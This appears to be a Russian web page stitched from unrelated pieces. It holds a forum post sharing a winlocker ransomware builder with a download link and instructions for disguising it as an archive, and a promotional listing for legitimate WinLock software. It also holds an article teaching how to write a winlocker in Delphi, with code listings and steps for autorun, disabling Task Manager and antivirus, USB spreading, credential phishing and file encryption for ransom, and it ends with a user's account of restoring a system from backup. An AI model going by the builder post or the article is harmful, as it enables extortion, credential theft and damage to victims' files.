Софт

создать винлокер

Рейтинг: 4.3/5.0 (843 проголосовавших)

Категория: Windows

Описание

Обзор Обзор программы MBR-locker Bilder v2

Обзор программы MBR-locker Bilder v2.0 (мощный Winlocker)

Кому интересны вин локеры тому сюда! Я хочу рассказать вам про один билдер. Может вы слышали о нём ) MBR-locker Bilder v2.0 скачать можно с яндекса диска

ссылка на MBR-locker Bilder v2.0: http://yadi.sk/d/e_CoSezf8Pk_3
Пароль: Makish115


Скрин моего MBR-locker

Плюсы: MBR-locker Bilder
1. Его трудно снять! Так как он запускается сразу как компьютер начинает считывать Windows с жёского диска.
2. Его легко создать и он весмт 10кб

Минусы: MBR-locker Bilder
1.Ему нельзя сделать красивое оформление, браузеров, менюшек и др. у него стандартный вид (только цвет шрифта можно менять)
2.МОЖНО ИСПОЛЬЗОВАТЬ ТОЛЬКО русские буквы и цифры. (Хоть одна английская буква в тексте и ваш вин лок просто не будет работать!(просто будут за место слов символы и правильного пароля не будет вообще)

Инструкция по MBR-locker Bilder:
1.Открыть MBR-locker Bilder v2.0 Вписать в большое поле текст для жертвы.
2.Текст должен содержать СТРОГО РУССКИЕ буквы и цифры ( НИКАКИХ АНГЛИЙСКИХ БУКВ!)
3.Выбрать цвет и иконку по вкусу.
4.Создать!

Как замаскировать:
1.Нужен архиватор Rar
2.Берём наш вин лок и какой ни будь файл весящий примерно 5мб (любой)(это нужно чтоб наш вин лок без подозрений весил 5.1мб. а не 10кб)
3.выделяем два файла и нажимаем правой Кн.Миши "Добавить в архив. "
4.Далее вылезет окно, делайте как на скрине.


5.Переходим во вкладку "Дополнительно" и жмём "Параметры SFX. "


6.Далее в в этом окне переходим во в кладку "Режимы"


7.Далее переходи во вкладку "Обновление"


8.И последнее переходим во вкладку "Текст и графика"


9.Далее жмём "Ок" создаём архив и всё замаскированный MBR Вин лок готов.

У вас должен получится .exe файл с вашей иконкой которую вы выбрали!

Всем спасибо с вами был Makish115 !
Пишите в скайп: Makish115

__________________
Пишу трояны! На перфокартах

Последний раз редактировалось vasequnen; 29.08.2013 в 07:17.

создать винлокер:

  • скачать
  • скачать
  • Другие статьи, обзоры программ, новости

    WinLock - скачать бесплатно русскую версию WinLock для Windows

    WinLock Основная информация о программе

    WinLock - это программа, позволяющая обеспечить дополнительную безопасность данных на общедоступных компьютерах. По истечению заданного промежутка времени утилита блокирует систему до тех пор, пока не будет введён правильный пароль. Это гарантирует, что только авторизованные пользователи могут получить доступ к конфиденциальной информации на вашем ПК.

    WinLock позволяет ограничить доступ к важным системным ресурсам - Панели управления, Рабочему столу и системному реестру. А также отключить горячие клавиши Windows (например, Alt-Ctrl-Del, Alt-Tab, Ctrl-Esc и т.д.), скрыть кнопку Пуск и Панель задач.

    Встроенная система родительского контроля позволяет активировать фильтры, открывающие доступ к сайтам, полезным для изучения и ознакомления, и заблокировать те, посещение которых нежелательно.

    С помощью WinLock также можно запретить доступ к выбранным файлам, приложениям и избранным точкам входа Проводника Windows (Корзина, Мой компьютер и т.д.), USB и жестким дискам. Кроме того, программой можно управлять и настраивать её удаленно с помощью WinLock Remote Administrator.

    Поддерживает как 32-битные, так и 64-битные ОС. Имеет многоязычный интерфейс.

    Ключевые особенности и функции
    • ограничения системы - отключение командной строки, Панели управления, безопасного режима и многое другое;
    • ограничение времени доступа - контроль, как долго другие пользователи могут использовать компьютер;
    • ограничение меню Пуск - избирательное скрытие пункты меню, блокировка контекстного меню;
    • контроль доступа в Интернет - разрешение доступа только к доверенным сайтам и блокировка всех других ресурсов;
    • фильтр программного обеспечения - блокировка доступа к загрузчикам, играм, мессенджерам или записи компакт-дисков;
    • сокрытие дисков - возможность скрыть свои системные и сетевые диски в Проводнике Windows;
    • ведение журнала - мониторинг изменений оболочки Windows и запись этих изменений в файл журнала и другие.
    Ограничения бесплатной версии
    • 30 дней пробного периода;
    • экран напоминания о регистрации.
    Специальные требования
    • 15 Мб свободного места на жестком диске;
    • TCP/IP сеть для удаленного администрирования.
    Что нового в этой версии?
    • добавлена поддержка USB-аутентификации;
    • добавлен генератор паролей;
    • добавлен новый режим блокировки;
    • добавлена поддержка браузера Tor;
    • добавлена клавиша, скрывающая панель инструментов в Internet Explorer 9;
    • добавлена возможность отключения автоматических обновлений в Windows 10;
    • теперь экранный таймер работает в стандартной версии программы;
    • добавлена голландская локализация;
    • обновлены языковые файлы для португальского и французского языков;
    • внесены мелкие изменения и исправления.
    Смотреть всю историю изменений Вопросы и ответы по программе

    Создать винлокер

    Delphi. Как я писал WinLocker

    Твою мать! Я опять хватанул эту заразу! Fuck, shit! Примерно так каждый из нас ругается в очередной раз, подхватив популярную малварь типа Winlocker. Сегодня вирусы такого типа как чума в средневековье. Хватануть их легко, а лечить проблематично. Что говорить, даже самые матерые маги клана «антивирус» не всегда способны дать оперативный отпор мерзопакостной заразе. А ведь 99% этих творений написаны школьниками, которые едва-едва научились кодить. В этой статье я постараюсь доходчиво разжевать все тонкости разработки ужасных винлокеров.

    Как происходит заражение

    Не будем сразу лезть в кодерские дебри, а разберемся, с теорией. Самым первым делом рассмотрим типичные варианты заражения. Способов заразиться – чрезвычайно много. Наибольшей популярностью пользуются:

    1. Баги браузеров. Не для какого не секрет, что одна из целей современного вирусописателя браузер пользователя. Полезных web-сервисов пруд пруди и пользователи, конечно же, ими пользуются. Браузер для многих самая часто используемая программа, которая очень редко закрывается (прим. автора – у меня вообще не закрывается).

    Не надо ходить к гадалке и спрашивать ответ на вопрос: «Через какую дверь лучше всего прорваться в систему пользователя?». Тут и так ясно – нужно заюзать уязвимости в самых популярных браузерах. Чтобы провернуть этот способ на практике – не нужно обладать особым интеллектом. Достаточно пробежаться по security-сайтам, найти соответствующий exploit и красиво оформить его под свои нужды. Быстро, просто и бесплатно.

    2. Здравствуй бажный Flash. В последние месяцы, компания Adobe лажает максимально круто. Не успеют выпустить новую версию flash плеера, как хакеры умудряются обнаружить в ней критическую уязвимость. Находят, тыкают разработчиков носом, а те не спешат их (или не могут?) исправлять. Глупо полагать, что вирусописатели будут сидеть на месте и ждать, когда же залатают багу. Они не дремлют и пытаются эксплуатировать уязвимость в коростных целях. Вот так и выходит, что после просмотра забавного ролика, твоя система начинает вести себя странно.

    3. Пользовательская наивность. Когда я начинал готовить эту статью, то ради эксперимента загрузил ОС в виртуальной машине и попробовал побродить по «сомнительным» сайтам. Не поверишь, но я умудрился три раза подхватить Winlocker, согласившись на установку «последней версии» flash плеера и «специальных» кодеков. Честно говоря, я был немного в шоке, т.к. думал, что подобные способы уже не канают, а нет…

    На чем будем кодить

    Я долго думал, на каком языке, писать примеры к данной статье, и решили вспомнить хорошо проверенный временем Delphi. «Так у тебя же exe'шник получится под мегабайт!», - возразишь ты. Отчасти твоя, правда, но эту проблему мы решим еще на стадии зарождения. Весь код будет приведен на чистом API. Соответственно, скомпилированный проект будет весить меньше 100 килобайт. А если по нему пройтись архиватором байт кода, то удастся скинуть еще пару десятков кило.

    Основа любого Winlocker'а

    Главный кирпич любого Winlocker – форма, растянутая почти на весь экран. Причем это не, просто большая форма, а окно, которое перекрывает все остальные и совершенно не слушается никаких команд. Ни свернуть, не изменить размер, ни уж тем более завершить процесс программы.

    На первый взгляд может показаться, что вирусописатели изобрели какое-то ноу-хау, но в реале все намного проще. По факту, это самое обычное окно, для которого установлен стиль отображения поверх всех окон. Чтобы окно вело себя как партизан и не реагировало на просьбы юзера, разработчики слегка модифицируют процедуру обработки сообщений из внешнего мира.

    Модификация сводится к банальной обработке сообщения WM_SYSCOMMAND. Если быть еще точнее, то в процедуре (см. листинг 1) обработки полученных сообщений, нужно всего, лишь объявить проверку на сообщение WM_SYSCOMMAND. Самое смешное, что в обработке этого сообщения можно вообще не писать код. Твоя форма и так перестанет реагировать на события внешней среды.

    Вирус должен загружаться вместе с операционной системой. Чем раньше будет запущен вирус, тем больше шанцев, что установленные антивирусы пойдут лесом. Существует несколько способов обеспечить своей программе автозагрузку. Условно их можно разделить на две группы: простые и продвинутые. На рассмотрение продвинутых не хватит места в статье, поэтому поглядим лишь на простые, основанные на использовании реестра. Итак, в реестре есть несколько уголков автостарта:

    1.HKLM\Software\Microsoft\Windows\CurrentVersion\Run – отсюда стартуют программы, запускаемые при входе в систему любого юзера.
    2.HKCU\Software\Microsoft\Windows\Current\Version\Run – место аналогично предыдущему, за исключением того, что отсюда стартует программы для текущего пользователя.
    3.HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices – список программ запускаемых до входа пользователей в систему.
    4.HKLM\Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run – этот раздел реестра отвечает за старт программ, добавленных в автозагрузку через групповые политики.
    5.HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows – еще одно место, содержащее список программ, загружаемых вместе с Windows.
    6. KHLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon – в этой ветке указывается ссылка на винлогон, но ничего не мешает указать и путь до своей программы.
    7. Папка автозагрузки. Пожалуй, самый примитивный способ, но тем немее, многие вирусописатели им пользуются.

    Какое из предложенных мест автозагрузки выбрать для своего творения? Точного ответа нет, но крайне рекомендуется не ставить все на какой-то один их предложенных вариантов. Куда лучше использовать комбинацию, т.е. прописываться сразу в несколько мест. Пример записи в автозагрузку на WinAPI приведен в листинге 2.

    Листинг 1. Незакрываемое окно на Windows API

    wc.cbSize:=sizeof(wc); wc.style:=cs_hredraw or cs_vredraw; wc.lpfnWndProc:=@WindowProc; wc.cbClsExtra:=0; wc.cbWndExtra:=0; wc.hInstance:=HInstance; wc.hIcon:=LoadIcon(0,idi_application); wc.hCursor:=LoadCursor(0,idc_arrow); wc.hbrBackground:=COLOR_BTNFACE+1; wc.lpszMenuName:=nil; wc.lpszClassName:='win_main';

    MainWnd:=CreateWindowEx(
    0,
    'win_main',
    'test',
    ws_overlappedwindow,
    leftPos,
    topPos,
    windowWidth,
    windowHeight,
    0,
    0,
    Hinstance,
    nil
    );

    SetWindowLong(MainWnd, GWL_HWNDPARENT,
    GetDesktopWindow);

    SetWindowPos(MainWnd, HWND_TOPMOST,
    0, 0, 0, 0, SWP_NOMOVE or SWP_NOSIZE);

    ShowWindow(MainWnd, CmdShow);
    While GetMessage(Mesg,0,0, do
    begin
    TranslateMessage(Mesg);
    DispatchMessage(Mesg);
    end;

    Листинг 2. WinAPI для работы с реестром

    var Key: HKey; begin //Сюда можешь подставить один из путей автозагрузки. RegOpenKey(HKEY_LOCAL_MACHINE, PChar('путь в реестре'), Key); RegSetValueEx(Key,PChar(paramstr( ), 0, REG_SZ, pchar(paramstr( ), lstrlen(pchar(paramstr( ))+1);

    И тебя заблокируем

    Переходим к самой интересной части – блокировки системы пользователя. Честно говоря, чего-то сверхнового я тебе врядли расскажу. Если ты хоть раз пользовался каким-нибудь твикером, то наверняка уже знаком с большинством из рассмотренных далее примеров. Все блокировки производятся путем внесение изменений в реестр.

    Перед тем как рассмотреть конкретные примеры объектов блокировки, я хочу поделиться с тобой одним советом. На основе него, очень легко придумывать новые «пакости». Идея проста до безобразия. В профессиональных редакциях Windows (те, что Pro и выше) имеется редактор групповых политик (gpedit). С его ты имеешь возможность создавать правила входа в систему и т.д. Например, ты запросто можешь назначить программу, которая будет запускаться после загрузки системы, заблокировать старт определенного приложения и т.д. Практически все операции, которые выполняются через эту оснастку, на самом деле изменяют определенные ключи реестра. Если ты умудришься разузнать, какие именно ключи реестра модифицируются, то без проблем сможешь изменять их прямо из своей программы. Как это сделать? Минимум существует два варианта: применить метод научного тыка или воспользоваться утилитой ProcessMonitor от Марка Руссиновича. Второй способе явно круче, поэтому советуем скачать утилиту и приступить к исследованиям.

    Большинство пользователей привыкли редактировать реестр с помощью встроенного в Windows редактора реестра (regedit). Поскольку наш вирус будет вносить изменения в реестр, нам кровь из носа нужно не допустить, ковыряние в реестре со стороны нерадивого пользователя. Нечего ему совать свой любопытный нос, куда не надо. Решить это задачу лучше путем блокировки запуска редактора реестра. Чтобы выполнить блокировку, достаточно создать ключ DisableRegistryTools со значением 1 в ветке HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System.

    Все винлокеры, которые я видел, без исключения блокировали запуск диспетчера задач. Что ж не будем от них отставать. Реализуется эта фича путем создания ключа DisableTaskMgr (тип dword) со значением 1 в той же самой ветке, где и DisableRegistryTools.

    Установка и удаление программ

    Особо мозговитые юзеры, путем аплета установка и удаление программ, в случае заражения системы пытаются инсталлировать антивирусы. Это легко присечь на корню, если создать ключ NoAddRemovePrograms со значением 1 (тип dword) все в том же разделе, где и DisableRegistryTools.

    Блокируем доступ к дискам

    Чтобы полностью испортить пользователю настроение можно вообще заблокировать доступ к присутствующим дискам в системе. Пусть юзер даже не пытается запустить антивирус со своей флешки! Выполняем эту трик путем создания ключа NoViewOnDrive (тип dword) в разделе HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. В качестве значения для ключа указываем битовою маску блокируемого диска. Например, для диска C эту будет 4. В случае если требуется заблокировать несколько дисков, то их маски придется сложить. Например, значение 12 будет соответствовать блокировке диска C ( 4 ) и D ( 8 ).

    Ограничиваем запуск приложений

    С помощью реестра реально определить список одобренных для запуска программ. Если этот список заполнен, то все приложение, которые в него не попали, пользователь запустить не сможет. Список одобренных к запуску приложений создается здесь: HKEY_CURRENT_USER\Microsoft\Windows\CurrentVersion\Policies\Explorer\RistrictRun. Создав в этом разделе ключи (тип REG_SZ) для каждой разрешенной программе, тебе нужно будет подняться на один уровень выше и добавить параметр RestrictRun типа dword со значением 1.

    Много нехороших дел сможет натворить пользователь, если у него имеется доступ к запуску оснастки «Управление компьютером». Полностью отключить оснастку с помощью реестра нельзя, но удалить ссылку на ее запуск из контекстного меню ярлыка «Мой компьютер» - проще пареной репы. Всего лишь требуется создать параметр NoManageMyComputerVerb типа dword со значением 1 в разделе HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer.

    Используя возможности реестра, ты без проблем сможешь отключить ненужные (например, антивирусы) пользователю службы. Полный список установленных в системе служб находится в ветке HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services. Для деактивации службы отредактируй значение ключа start. Например, чтобы установить службе «Тип запуска» в значение «вручную», ключу start необходимо присвоить 3. Если желаешь, чтобы твой вирус протянул во вражеской системе дольше, то советую вести в своем творении базу служб антивирусов. Т.е. тебе необходимо четко опознавать сервисы антивирусов и менять им тип запуска.

    А что еще нам надо?

    Типичные функции любого Winlocker'а мы рассмотрели, теперь самое время подумать о том, как улучшить наше детище. Честно говоря, я не понимаю, почему профессиональные вирусописатели не встраивают в подобные вирусы дополнительные полезные функции. Ведь нет никакой гарантии, что юзер дотянется до мобилы и отправит заветную смс'ку на короткий номер, тем самым обогатив автора вируса. Зато, всегда есть шанс увести с тачки пользователя полезную информацию: пароли на различные сервисы, документы, записанные skype переговоры и т.д. Мы не будем вводить каких-то ограничений, а проапгрейдим наш вирус по полной программе. Итак, ниже я описал шесть фишек, которые было бы полезно реализовать в подобном «проекте».

    Фишка №1: В любом месте веселее вместе

    Заразил компьютер бедного пользователя? Не забудь позаботиться о его друзьях! Помни, чем больше распространится вирус, тем больше шансов получить деньги. Обосновавшись на вражеской тачке, нужно не терять времени зря, а пытаться найти новый плацдарм. Как это сделать? Один из простых и самых действенных способов – мониторинг и заражение флэшек. Поскольку пользователи постоянно пользуются флешками, нашему вирусу будет легко мигрировать из одной системы в другую. Определить факт подключения флешки – легко. Достаточно написать код, обрабатывающий событие WM_DEVICECHANGE. Пример кода смотри в листинге №3.

    Листинг 3. Мониторим флешки

    var disk:DWORD; begin case Msg.WParam of DBT_DEVICEARRIVAL: //Если подключили флэшку if (PDEV_BROADCAST_HDR(Msg.LParam)^ .dbch_devicetype = DBT_DEVTYP_VOLUME) then begin //Пытаемся определить букву диска disk := PDEV_BROADCAST_VOLUME(Msg.LParam)^ .dbcv_unitmask; //Выполняем свой зловредный код end;

    DBT_DEVICEREMOVECOMPLETE: //Если флэшку извлекли
    if (PDEV_BROADCAST_HDR(Msg.LParam)^
    .dbch_devicetype = DBT_DEVTYP_VOLUME) then
    begin
    //Флешку отмонтировали
    end;

    В третьем листинге я использовал константы и структуры, описания которых нет в модулях, поставляемых вместе с Delphi. Их придется описывать самостоятельно.

    Фишка №2: Ваши пассы будут наши!

    Какими web-сервисами пользуется современный юзер? Не нужно иметь семь пядей во лбу, чтобы угадать хотя бы несколько из них: почта, одноклассники, в контакте, facebook, twitter, etc. Список можно продолжать до бесконечности. К чему это я клоню? А к тому, что находясь на вражеской территории, было бы неплохо собрать все пароли. Авось в будущем пригодятся. К тому же, имея на руках такие козыри, становится реальным простимулировать жертву. Например, получив пароли от всевозможных аккаунтов, автор вируса может воспользоваться ими для смены контактных персональных данных и изменения паролей на свои. В результате, реальный пользователь попадет в очень нехорошую ситуацию. Попросту говоря, он лишиться своего аккаунта. Это уже куда серьезней заблокированного рабочего стола, а раз так, то шансы оплаты «твоих услуг» возрастают.

    Сразу возникает вопрос, а каким образом это проще всего сделать? Обычно юзеры хранят свои пароли прямо в браузере, поэтому сразу напрашивается вариант угнать файлик хранилища паролей. Пример такого угона был продемонстрирован в статье «Злобный комп». Сейчас повторяться не буду, а лучше покажу тебе альтернативный способ.

    Идея заключается в банальном модифицировании hosts. В этом файле прописываются соответствия типа: «символьный адрес сайта:ip». Наша программа должна уметь модифицировать этот файл и добавлять соответствия для популярных web-сервисов. «А куда будем переадресовывать пользователя?». Можешь для этого замутить свой evil сайт, на котором и будут располагаться скамы популярных сервисов. Этот способ прост в реализации, но при массовом заражении пользователей, такие сайты наверняка будут умирать быстрей, чем самые дохлые бактерии. В связи с этим, откажемся от предложенного способа, а пойдем не совсем стандартным путем – встроим в вирус мини web-сервер. При таком раскладе пунктом назначения переадресации у нас будет localhost.

    Рассматривать правка файла host не будем, лучше сразу взглянем на то, как с помощью Delphi поднять WEB-сервер. Если ты постоянный читатель нашего журнала, то ты уже должен хорошо ориентироваться в Winsock API. Где-то года два назад, в рубрике кодинг публиковали мои статьи про написание всевозможных клиентов (FTP клиент, PROXY сервер, IRC и т.д.) используя лишь api функции. Рекомендую тебе поднять подшивку и хорошенько ознакомиться с сабжевой темой. Как разберешься, возвращайся и кури третий листинг:

    Листинг 4. Самопальный WEB-Сервер

    var _buff: array [0..1024] of char; _request:string; _temp: string; _path: string; _FileStream. TFileStream; begin Recv(_client, _buff, 1024, 0); _request:=string(_buff);

    _path := GetFilePath (Copy
    (_request, 1, pos(#13, _request)));
    _path := ReplaceSlash(_path);

    if ((_path = '') or (_path = '\')) Then
    _path := DocumentRoot +'\' + DirectoryIndex;
    < else
    if ((_path[length(_path)] ='\')) Then
    _path := DocumentRoot + '\' +
    DirectoryIndex; >

    if (FileExists(_Path)) Then
    begin
    _FileStream :=
    TFileStream.Create(_Path, fmOpenRead);

    SendStr(_Client, 'HTTP/1.0 200 OK');
    SendStr(_Client, 'Server: xSrV');
    SendStr(_Client, 'Content-Length:' +
    IntToStr(_FileStream.Size));
    SendStr(_Client, 'Content-Type: '
    + GetTypeContent(_Path));
    SendStr(_Client, 'Connection: close');
    SendStr(_Client, '');
    SendFile(_Client, _FileStream);
    _FileStream.Free;
    End

    Теперь вбив одноклассники.ру, жертва попадет не на реальные одноклассники, а прямо в лапы нашего evil сервера. Само собой, web-сервер должен быть вежливым и отобразить реальную страницу одноклассников (читай – скам сайта, который нужно заранее подготовить). Ну а дальше все просто и банально – юзер вбивает свои данные для входа, после чего наш web-сервер их сохраняет. Чтобы не было откровенного палева, желательно сделать страницу, на которой описать, что одноклассники сейчас недоступны или что-то в подобном роде. Или как вариант, сразу отправлять введенные данные на реальные одноклассники.

    Фишка №3: Экстази для пользователя

    Все winlocker просят у честного юзера денег за излечение компа (которое, кстати так и не делают), но как и следует ожидать, платить желают далеко не все (я бы никогда не заплатил ). К чему этого я все говорю? А к тому, что неплохо было как-то простимулировать пользователя. Дать ему допинг, от которого наверняка захочется распрощаться с парой кровных баксов. Как это сделать? Один из действенных вариантов будет совершение марш броска по директориям пользователя и шифрование найденных файлов. На какие файлы обращать внимание? Лучше всего на те, от которых может завесить работа/учеба жертвы, например: документы (doc, xls, mdb, ppt, txt), изображения (jpeg, png, bmp), исходные тексты (php, pas, c, h, cpp, dpr, py и т.д.). Если жертва писала дипломную работу или какой-нибудь сверважный отчет, который завтра сдавать, то у тебя есть все шансы получить денежное вознаграждение. Как тебе идейка?

    Теперь поговорим о технической реализации это фичи. Поиск файлов осущетвляется с функциями FindFirst() и FindNext() из модуля Sysutils. Работать с ними легко, но простота фаст фуда отрицательно отразиться на фигуре нашего приложения. Поскольку, набирать лишний вес нам не к чему, мы воспользуемся более диетическими продуктами: FindFirstFile() и FindNextFile(). Работать с ними чуточку сложнее (см. пример поиска файлов на диске), но красота требует жертв.

    Шифрование файлов, средствами Delphi также осуществляется достаточно просто. Все зависит от выбранного способа шифрования. Один из самых простых воспользоваться готовыми модулями, которых на torry.net и на других сайтах пруд пруди. Например, мне попался неплохой вариант от одного из разработчиков Delphi. В этом модуле реализованы следующие функции:

    //Шифрование файла function FileEncrypt(InFile, OutFile: String; Key: TWordTriple): boolean; //Расшифровка файла function FileDecrypt(InFile, OutFile: String; Key: TWordTriple): boolean; //Шифрование текста function TextEncrypt(const s: string; Key: TWordTriple): string; //Расшифровка текста function TextDecrypt(const s: string; Key: TWordTriple): string; //Шифрование «памяти» function MemoryEncrypt(Src: Pointer; SrcSize: Cardinal; Target: Pointer; TargetSize: Cardinal; Key: TWordTriple): boolean; //Расшифровка «памяти» function MemoryDecrypt(Src: Pointer; SrcSize: Cardinal; Target: Pointer; TargetSize: Cardinal; Key: TWordTriple): boolean;

    Фишка №4: Размножайся!

    Попав в чужую систему нужно потрудиться и постараться удержаться в ней как можно дольше. Стопроцентно сказать, как это лучше всего это сделать, я не могу. Первое (и самое простое в реализации), что мне пришло в голову, встроить в winlocker мини джойнер. Алгоритм будет таким. При активации в системе жертвы основная программа будет заражать наиболее часто используемые программы. Причем, сам вирус прицепляться не должен. В качестве паразита будет выступать маленькая «безобидная» программка. Ее основной функцией будет выполнение проверки на наличие процесса вируса. Если его нет, то необходимо инициировать загрузку «вируса» из интернета и дальнейший его запуск.

    С точки зрения программирования, создать joiner совсем не сложно. К тому же, пару лет назад мы поднимали эту тему на страницах нашего журнала.

    Фишка №5: Играй в прятки по максимуму

    Как показала практика, авторы Winlocker'ов не сильно забоятся о безопасности своих детищ. Защита большинства представителей этой группы вирусов, попавшихся мне на глаза, сводилась к банальному присвоению неприметного имени файла. Например: system.exe, user32.exe, csrss.exe, eplorer.exe и т.д. Я не думал, что подобные способы еще прокатывают, но как выяснилось, я заблуждался.

    Я рекомендую тебе не пренебрегать безопасностью, а предусмотреть несколько разных алгоритмов:

    1. Давай файлу вируса неприметное имя. Хоть это и примитивное правило, но соблюдать его крайне желательно.
    2. Удали вирус из списка процессов. Этого можно добиться, разобравшись с перехватом API функций. Мы уже много раз писали про перехват API. Обязательно перечитай эти статьи!
    3. Используй несколько способов автозагрузки.

    Фишка №6: Убить на старте

    Не поленись и напиши процедуру принудительного завершения процессов. Она обязательно поможет тебе уберечь свое детище от злобных антивирусов, которые пользователь будет пытаться запустить. В идеале вообще организовать перехват функций, использующихся для запуска программ и не допускать, чтобы они нормально отрабатывали.

    Написать WinLocker и срубить на нем несколько сотен баксов – более чем реально. Пользователи по-прежнему не думают о безопасности и при возникновении щепетильной ситуации готовы отправить заветную смс'ку, нежели напрячь свои извилины. Сегодня я показал скелет типичного Winlocker'a. В принципе, довести его до боевого состояния дело нескольких часов. Только нужно ли это делать? Выбор за тобой! Главное не забывай о том, что написание и распространение вирусов уголовно-наказуемое деяние, за которое можно схлопотать реальный срок.

    P.S. Само собой, исходник полноценного вируса я не дам. Нет, не потому что я жадный. Эти вирусы и так всех достали, поэтому я чертовски не хочу, чтобы после этой статьи их стало еще больше. Вдобавок, мне не хочется читать новости как правоохранительными органами были задержаны очередные создатели ужасных вирусов .

    P.S.1. Автор и редакция предупреждают - вся информация представлена только для общего развития и в первую очередь направлена на то, чтобы показать алгоритм работы большинства вирусов подобного класса. Зная алгоритм - всегда можно придумать эффективную защиту.

    Written by: Антонов Игорь aka Spider_NET

    Создать винлокер

    Винлокер: кто виноват? И что делать?

    «…Пальто мне заказали с воротником. Отобрали мы у ателье это пальто…
    …Хотели им насильно вернуть - их больше, не хотят они.
    …Приехали домой, снова пальто на глаза попалось. У нас с собой было…»
    М.Жванецкий «Нормально, Григорий! Отлично, Константин!»

    И снова на экране монитора – баннер вируса WinLocker! Нет, не буду писать его название по-английски, много чести. Согласен английскими буквами писать многое, тот же Windows, например. Но Винлокеру слишком много чести, чтобы для его написания переключать раскладку клавиатуры! Поэтому будет он в дальнейшем называться Винлокер.

    …А еще писали в обзорной статье от Dr.Web, что в феврале 2012 года количество Винлокеров уменьшилось, чуть ли на 30%. Потому что пользователи ПК перестают платить мошенникам, и те теперь ищут новые способы подзаработать. Но на меня эта статистика, по-видимому, не распространяется.

    Даже смотреть на баннер не хочу, и вчитываться в текст не хочу, и смотреть на предложения об оплате для получения кода разблокировки тоже не хочу. Первый раз было даже чуточку интересно, вроде как небольшое приключение. А теперь тошно становится.

    Пишут (в том же обзоре Dr.Web), что мошенники, создающие Винлокер, действуют из Латвии. Хорошая и красивая страна! Рига, Юрмала, Елгава и еще много других красивых больших и маленьких городов. Интересно, в каком из них эти мошенники работают? И что, их нельзя поймать? Евросоюз, все-таки, не хухры-мухры!

    Ну да, ладно. Все, приехали. Сливай воду, туши свет, как говорится. Нажимаю и удерживаю долго в нажатом состоянии кнопку питания (это аварийное отключение ноутбука так делается), раздается щелчок, затем звук «ви-и-и-у» (это винчестер и вентиляторы останавливаются), и компьютер выключен. А вместе с ним выключен, надеюсь, навсегда, баннер Винлокера.

    План или У нас с собой было

    Что будем делать с баннером? Каков наш дальнейший план? Дело в том, что в этот раз я гораздо лучше вооружен (но не опасен!). Ведь у нас с собой было. Что было? Архивные копии, которые я регулярно (практически ежемесячно) делал, вот что!

    Итак, что мы имеем для борьбы с Винлокером? Во-первых, сам Винлокер, как источник неприятностей и предпосылка для организации боевых действий против него.

    Во-вторых, имеем диск восстановления системы Windows 7. Его я создал месяца три тому назад. Но, по идее, он не должен устаревать, так как на нем нет каких-либо текущих данных, важных копий и т.п. Он содержит необходимый минимум файлов, чтобы с него загрузить Windows, а затем восстановить систему и архивные данные из архивных копий.

    В-третьих, имеем образ системы месячной давности, записанный на внешний жесткий диск. Также на этом диске есть еще более ранние образы системы, штук 5 образов, архивированные примерно каждый месяц. Образ системы месячной давности – это хорошо. Пусть там нет самых последних обновлений, но месяц назад система работала исправно, поэтому ее можно из этой копии смело восстанавливать.

    Наконец, в-четвертых, имеем архивные копии данных, хранящиеся на убитом Винлокером ПК. Последняя копия имеет месячную давность, как и образ системы. Это плохо. За месяц многое сделано. Но скорее всего, данные не нужно будет восстанавливать. Попробуем восстановить только систему из сохраненного в архиве образа системы. А данные, наверняка, остались, нетронутые вирусом.

    Итак, наш план, составленный согласно приведенным выше четырем пунктам.

    • Убиваем «во-первых» Винлокер за счет следующих действий:
    • Загружаемся с того, о чем идет речь выше со слов «Во-вторых».
    • Восстанавливаем систему из того, что описано выше «В-третьих».

    И празднуем победу над Винлокером, в том числе, мысленно вместе со всеми честными гражданами Латвии!

    Первый шаг в борьбе – это загрузка с диска восстановления системы. Казалось бы, чего проще. Берем диск, вставляем его, запускаем ПК, загружаемся с него. И все.

    Да не тут-то было. Как открыть крышку DVD-устройства, если питание ПК выключено. А если включаешь питание, то появляется надпись о том, что система Windows была остановлена некорректно, и предлагаются различные варианты загрузки, кроме загрузки с диска восстановления системы. Нет этого в меню!

    К тому же работает счетчик, который через 30 секунд предлагает заново загрузить Windows. А это означает, что через 30 секунд я опять буду лицезреть баннер Винлокера. А я дал себе зарок больше на него даже не смотреть, назло недобросовестным латышам! «Фигвам – древнее индейское жилище», – как говорил кот Матроскин.

    Снова выключаю ПК (длительным нажатием на кнопку питания). Напрягаю мозг (сложное занятие, скажу вам!), вспоминаю, что для загрузки с DVD-устройства нужно в BIOS изменить порядок загрузки (на страничке «Boot», что в переводе означает «Загрузка»). Но для этого надо попасть в BIOS. Опять напрягаюсь, вспоминаю, что при загрузке ПК надо удерживать нажатой клавишу, кажется, F1.

    Включаю питание, жму F1. Нулевой результат. Опять попадаю в меню загрузки системы, опять работает счетчик, обратный отсчет от 30-и секунд. Выключаю ПК снова. Начинаю понимать, что мой ноутбук защищен от меня, от моей возможности вмешиваться в BIOS. Или нужно читать инструкцию, а инструкция записана на жестком диске ПК, а ПК не работает! Круг замкнулся.

    Тогда решаюсь на эксперимент. Включаю питание и, пока обратный отсчет идет, за эти 30 секунд открываю DVD-устройство, вставляю в него диск восстановления системы, закрываю устройство. И опять выключаю ПК. В результате – ПК выключен, но внутри DVD-устройства стоит диск восстановления системы. Ура! Первое действие выполнено.

    Снова включаю питание и, о чудо, компьютер начинает грузиться с вставленного в него диска восстановления системы. «Ура, заработало!» – это опять цитата кота Матроскина.

    Итак, ПК загружен с диска восстановления системы. На экране появился запрос на подключение устройства, где хранится образ системы. Подключаю внешний жесткий диск с архивными копиями образа системы к USB-порту ПК.

    Небольшая пауза, и на экране появляются заголовки всех моих архивных копий с указанием дат копирования. Можно выбирать. Выбираю самую последнюю архивную копию образа системы, месячной давности, как я и предполагал. Жму клавишу «Enter», и получаю приятнейшее сообщение о том, что система будет восстановлена из образа от такого-то числа, месяца, года, и что это может занять какое-то время. «Нормально, Григорий! Отлично, Константин!» (М.Жванецкий).

    Будем ждать, и готовить банкет по случаю бескровной победы над Винлокером. Тем более что для этого как раз есть время, часа полтора, пока идет восстановление системы из архивной копии.

